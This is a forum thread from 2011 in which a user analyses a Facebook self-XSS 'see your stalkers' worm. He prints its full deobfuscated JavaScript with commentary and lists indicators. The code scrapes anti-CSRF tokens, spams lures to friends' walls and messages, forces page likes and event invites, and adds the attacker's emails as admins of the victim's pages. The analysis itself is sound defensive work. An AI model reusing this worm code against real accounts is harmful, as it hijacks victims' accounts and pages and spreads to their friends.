Analysis of a Facebook social engineering/Javascript "hack"
#1
Analysis of a Facebook social engineering/Javascript "hack"
I received a notification to "see my facebook stalkers" from one page I frequent. The "tool" turns out to be a script you are told to paste into your own browser while logged in to Facebook — a textbook self-XSS. Dubious but curious, I loaded the injection and executed it (next time, use a dummy account, or better, read it without running it at all...).

Suspecting some mischief, I launched another facebook tab to see if it was doing what my instincts were telling me.

It was.

Luckily I halted it before it got to 16 people. Still, that means at least 15 people to scrub my hijacked posts out of.

Looking at the JavaScript source (fetched from http://fbonlines.info/StalkerTools.fb), I found it packed as a comma-separated list of character codes, each offset by 24, that a tiny loader decodes and hands straight to eval(): (packed blob hidden as it is really a bear — I kept it only for the sake of integrity)


However, beyond that packing the author only ran the code through a common off-the-shelf JavaScript obfuscator — hex-style identifier renaming (_0x91e5x2 and friends) and bracket property access, no real protection (his first mistake) — so http://jsbeautifier.org/ yields perfectly readable code:

Code:
// Stage-1 unpacker for the obfuscated payload. The packed input is a
// comma-separated list of integers; each is shifted down by 24 and converted
// back to a character, and the reconstructed source is executed via eval()
// inside the logged-in facebook.com origin.
// Analysis tip: swap eval(d) for console.log(d) to dump stage 2 without
// running it. Note every variable here is an implicit global (no var).
// @param {string} _0x91e5x2 - comma-separated, +24-offset character codes.
function _88xuhyr(_0x91e5x2) {
    st = _0x91e5x2['split'](',');
    d = '';
    for (i = 0; i < st['length']; i++) {
        d += String['fromCharCode'](st[i] - 24);
    };
    eval(d); // runs the decoded stage-2 worm (everything below)
};


// Persistence / takeover step: adds the attacker's e-mail addresses as
// administrators of a page the victim controls, by forging the same-origin
// POST that the page admin editor sends. The victim's session cookies are
// attached automatically and the scraped post_form_id / fb_dtsg values
// satisfy Facebook's anti-CSRF check, so from the server's view this is the
// victim legitimately adding admins. Fire-and-forget: no response handling.
// @param {string} _0x91e5x4 - numeric id of the page to take over.
// @param {string} _0x91e5x5 - comma-separated e-mail addresses to add as admins.
// @param {string} _0x91e5x6 - scraped post_form_id token.
// @param {string} _0x91e5x7 - scraped fb_dtsg anti-CSRF token.
function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
    iemails = _0x91e5x5['split'](',');
    main_emails = [];
    for (i = 0; i < iemails['length']; i++) {
        // one friendselector_input[] entry per e-mail, mirroring the real form
        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
    };
    with(newx = new XMLHttpRequest) {
        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
    };
};


// Posts a random lure status onto another user's wall. The anti-CSRF tokens
// are re-scraped from the HTML passed in (the caller passes the current
// document body), a lure is picked at random and the status composer payload
// is handed to update(). text_post / text_actual are always empty, so the
// trailing-comma replace() calls are no-ops left over from some other build.
// @param {string} _0x91e5x9 - page HTML to scrape post_form_id / fb_dtsg / xhpc_composerid from.
// @param {string[]} _0x91e5xa - lure texts; one is chosen via the randomize() prototype hack.
// @param {string} _0x91e5xb - "id|name" friend record; the id before '|' becomes xhpc_targetid.
// @param {*} _0x91e5xc - unused.
function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
    msg = _0x91e5xa['randomize']() + '\x0A\x0A';
    text_post = '';
    text_actual = '';
    // privacy_data[value]=40: meaning of the constant is not shown here — presumably a
    // broad ("everyone"/"friends of friends") audience setting; verify before asserting.
    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
    update(pxt);
};


// Sends a pre-built status-composer payload to the AJAX status endpoint.
// No readyState handler: the worm never checks whether a post succeeded.
// @param {string} _0x91e5xe - urlencoded form body (see makePost / the inline callers).
function update(_0x91e5xe) {
    with(newx = new XMLHttpRequest) {
        open('POST', '/ajax/updatestatus.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send(_0x91e5xe);
    };
};
// Campaign configuration — all of these are indicators worth blocking/hunting for.
// Six goo.gl short links are rotated through the lure texts; where they resolve
// is not shown here (presumably back to the fbonlines.info / fbviews.org lure).
goog1 = 'http://goo.gl/kryZJ';
goog2 = 'http://goo.gl/m2kvB';
goog3 = 'http://goo.gl/y4lbw';
goog4 = 'http://goo.gl/vNRZN';
goog5 = 'http://goo.gl/hF0UK';
goog6 = 'http://goo.gl/zc4Ja';
event_id = '168046893242650';    // attacker's event: every friend gets invited to it
page_id_x = '198161766879493';   // attacker's page: the victim is forced to "like" it
page_id_xx = '';                 // second page slot, empty in this build (the like request still fires)
// Attacker-controlled addresses that get added as admins of every page the
// victim administers. Redacted as "[email protected]" in this rendering of the post.
admin_emails = '[email protected],[email protected]';
// Lure texts posted to the victim's wall, friends' walls, pages and messages.
statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile-- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];
// Subject lines for the direct messages sent to the first 15 friends.
subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];
// Prototype pollution helper: returns a uniformly random element of any array.
// Used to pick lure texts and message subjects.
Array['prototype']['randomize'] = function () {
    return this[Math['floor'](Math['random']() * this['length'])];
};
// Patched onto Object.prototype (so it lands on every object, including XHRs):
// true when an XMLHttpRequest has completed with HTTP 200.
Object['prototype']['isReady'] = function () {
    if (this['readyState'] == 4 && this['status'] == 200) {
        return true;
    } else {
        return false;
    };
};
// Parses the friend-browser AJAX response into an array of "id|name" strings.
// The response embeds HTML inside a JSON string, which is why the regexes match
// backslash-escaped quotes and slashes (\\\\\\\/ and \\\\\\\"). Entries are
// joined with ':' then re-split, and the first entry is dropped — presumably
// an artifact of the join/split rather than a real friend; not verifiable here.
String['prototype']['getFriends'] = function () {
    friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);
    return friends2;
};


// Second, byte-identical copy of addAdmin (the obfuscator or author pasted the
// helper twice). Function declarations are hoisted and the later one wins, but
// the bodies are the same so behaviour is unaffected.
// Adds the attacker's e-mails as administrators of page _0x91e5x4 with a forged
// same-origin POST authenticated by the victim's cookies and scraped tokens.
// @param {string} _0x91e5x4 - page id.
// @param {string} _0x91e5x5 - comma-separated e-mail addresses.
// @param {string} _0x91e5x6 - post_form_id token.
// @param {string} _0x91e5x7 - fb_dtsg token.
function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
    iemails = _0x91e5x5['split'](',');
    main_emails = [];
    for (i = 0; i < iemails['length']; i++) {
        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
    };
    with(newx = new XMLHttpRequest) {
        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
    };
};


// Decoy UI: overlays a "Scanning may take up to 3 minutes" spinner so the
// victim keeps the tab open while the worm spams in the background. The
// spinner image is loaded from fbviews.org — another indicator, and a beacon
// the operator can count hits on. 'zindex' is not a valid style property
// (should be zIndex), so the overlay is not actually raised above the page.
function loading() {
    var _0x91e5x10 = document['createElement']('div');
    _0x91e5x10['id'] = 'screwyouz';
    _0x91e5x10['setAttribute']('align', 'center');
    _0x91e5x10['style']['margin'] = '0px auto';
    _0x91e5x10['style']['position'] = 'absolute';
    _0x91e5x10['style']['top'] = '10px';
    _0x91e5x10['style']['zindex'] = '100';
    _0x91e5x10['className'] = 'screwyou';
    _0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
    document['body']['appendChild'](_0x91e5x10);
};


// Second, byte-identical copy of makePost (see the first definition above);
// the later declaration wins, with no change in behaviour.
// Scrapes the anti-CSRF tokens from the supplied HTML, picks a random lure and
// posts it to the wall of the friend whose id precedes '|' in _0x91e5xb.
// @param {string} _0x91e5x9 - page HTML to scrape tokens from.
// @param {string[]} _0x91e5xa - lure texts.
// @param {string} _0x91e5xb - "id|name" friend record.
// @param {*} _0x91e5xc - unused.
function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
    msg = _0x91e5xa['randomize']() + '\x0A\x0A';
    text_post = '';
    text_actual = '';
    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
    update(pxt);
};


// Second, byte-identical copy of update(): POSTs a status-composer payload to
// the AJAX status endpoint without inspecting the response.
// @param {string} _0x91e5xe - urlencoded form body.
function update(_0x91e5xe) {
    with(newx = new XMLHttpRequest) {
        open('POST', '/ajax/updatestatus.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send(_0x91e5xe);
    };
};
// Token harvest. Everything that follows depends on post_form_id, fb_dtsg and
// xhpc_composerid, which Facebook embeds in the logged-in home page. Because
// the script runs inside the victim's own facebook.com tab (self-XSS), it can
// read them straight out of the DOM — or, if the victim pasted it on some other
// facebook.com URL, fetch '/' with a synchronous same-origin GET (third arg
// false) and regex them out of the response. This is exactly why anti-CSRF
// tokens do not help against script the user runs in their own session.
if (window['location']['href'] == 'http://www.facebook.com/') {
    formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
} else {
    with(muhaha = new XMLHttpRequest) {
        open('GET', '/', false);   // synchronous: blocks the tab until '/' is fetched
        send(null);
    };
    formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
};
// Decoy prompt, then the first payload: a random lure status posted to the
// victim's OWN wall. The victim's user id comes from the c_user cookie, which
// must therefore be readable by script (not HttpOnly) for this to work.
alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');
update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
// Shows the decoy spinner, then forces the victim to "like" the attacker's
// page (page_id_x) via the fan_status endpoint (add=1), using the scraped tokens.
with(newz = new XMLHttpRequest) {
    loading();
    open('POST', '/ajax/pages/fan_status.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
// Same forced "like" for a second page slot. page_id_xx is '' in this build,
// so the request goes out with an empty fbpage_id — presumably a placeholder
// for another campaign page. The trailing void 0 is a no-op.
with(newzz = new XMLHttpRequest) {
    open('POST', '/ajax/pages/fan_status.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
void 0;
// Friend-spreading stage. Fetches the victim's full friend list, then:
//   1. invites every friend (all numeric ids at once) to the attacker's event;
//   2. every 3 s, takes the next friend and posts the lure on their wall
//      (makePost) and, for the first 15 friends only, sends them a Facebook
//      message carrying the lure (the 15 cap is presumably to stay under a
//      messaging rate limit — not verifiable here);
//   3. when the list is exhausted, redirects the tab to fbviews.org/result.php.
// Note the off-by-one: the end check runs before makePost, so after the last
// friend one more tick calls makePost with friends[cnt_fr] undefined, which
// throws on .split — the redirect has already been scheduled, so it goes unseen.
with(fr = new XMLHttpRequest) {
    open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');
    onreadystatechange = function () {
        if (fr['isReady']()) {
            friends = fr['responseText']['getFriends']();   // ["id|name", ...]
            idx = [];
            for (i = 0; i < friends['length']; i++) {
                // non-numeric ids leave holes in idx, which join() renders as empty '&&' segments
                if (!isNaN(friends[i]['split']('|')[0])) {
                    idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
                };
            };
            // bulk event invite to the attacker's event_id
            with(invi = new XMLHttpRequest) {
                open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
                setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
            };
            cnt_fr = 0;
            tx = setInterval(function () {
                if (cnt_fr == friends['length']) {
                    window['location'] = 'http://fbviews.org/result.php';
                    clearInterval(tx);
                };
                makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);   // wall post on this friend
                with(xa = new XMLHttpRequest) {
                    // fetch a fresh composer id for the messaging endpoint
                    open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
                    onreadystatechange = function () {
                        if (xa['isReady']()) {
                            compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
                            pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
                            if (cnt_fr < 15) {   // direct message only to the first 15 friends
                                with(mi = new XMLHttpRequest) {
                                    open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                                    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                                    send(pxi);
                                };
                            };
                        };
                    };
                    send(null);
                };
                cnt_fr += 1;
            }, 3000);
        };
    };
    send(null);
};
// Page-takeover stage, running concurrently with the friend stage. Loads the
// Insights page (only lists pages the victim administers), scrapes their ids
// from the 'po_<id>">View' links, and every 3 s posts the lure as a status on
// one page and calls addAdmin() to grant the attacker's e-mail addresses admin
// rights on it. This is the part with lasting damage: the attacker keeps the
// pages even after the victim cleans up their wall. Same off-by-one at the end
// of the list as in the friend loop, and the same redirect to fbviews.org.
with(ins = new XMLHttpRequest) {
    open('GET', '/insights/?_fb_noscript=1');
    onreadystatechange = function () {
        if (ins['isReady']()) {
            ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');
            cnt_pages = 0;
            tz = setInterval(function () {
                if (cnt_pages == ids['length']) {
                    window['location'] = 'http://fbviews.org/result.php';
                    clearInterval(tz);
                };
                // lure status posted to the page itself (xhpc_targetid = page id)
                update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
                addAdmin(ids[cnt_pages], admin_emails, formx, dtx);   // attacker becomes page admin
                cnt_pages += 1;
            }, 3000);
        };
    };
    send(null);
};
Yes, ladies and gentlemen, you see it right. He has left his CnC e-mail accounts unobfuscated in the admin_emails string (redacted in this rendering), along with the hard-coded event and page IDs, the six goo.gl links and the fbonlines.info / fbviews.org hostnames — all of which make good indicators for blocking and takedown.

Looking at this, you can easily see what is going on. After scraping the post_form_id and fb_dtsg anti-CSRF tokens from your logged-in session, it posts a lure status to your own wall, force-"likes" the attacker's page and invites every friend to the attacker's event; it then iterates through your friends list every three seconds, posting the lure on each friend's wall and sending a Facebook message to the first 15. In parallel it pulls the list of pages you administer, posts the lure on each of them and adds the attacker's two e-mail addresses as page administrators.

He also rotates through six goo.gl short links in the lure text, presumably so the campaign survives Facebook blacklisting fbonlines.info directly.

Facebook's most effective immediate response would be to find and revoke every page-admin role granted to those two e-mail addresses (the addAdmin() request shows exactly how they were added) and to clean up the posts and messages sent through these endpoints in this pattern. The underlying vector — users pasting script into their own logged-in browser — is self-XSS, which anti-CSRF tokens like fb_dtsg cannot stop; only warning users in the console/address bar or blocking these request patterns server-side addresses it.
#2
RE: Analysis of a Facebook social engineering/Javascript "hack"
Nice work, did you report this to Facebook?
"How is it that a lame man does not annoy us while a lame mind does? Because a lame man recognizes that we are walking straight, while a lame mind says that it is we who are limping." - Pascal
#3
RE: Analysis of a Facebook social engineering/Javascript "hack"
Nope. They have an awfully difficult "Report" system...
#4
RE: Analysis of a Facebook social engineering/Javascript "hack"
(March 2, 2011 at 7:13 am)Moros Synackaon Wrote: Nope. They have an awfully difficult "Report" system...

In other words, they really don't have one? Dodgy
Please give me a home where cloud buffalo roam
Where the dear and the strangers can play
Where sometimes is heard a discouraging word
But the skies are not stormy all day
#5
RE: Analysis of a Facebook social engineering/Javascript "hack"
(February 28, 2011 at 9:25 pm)Moros Synackaon Wrote: Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.
Haha! Awesome Big Grin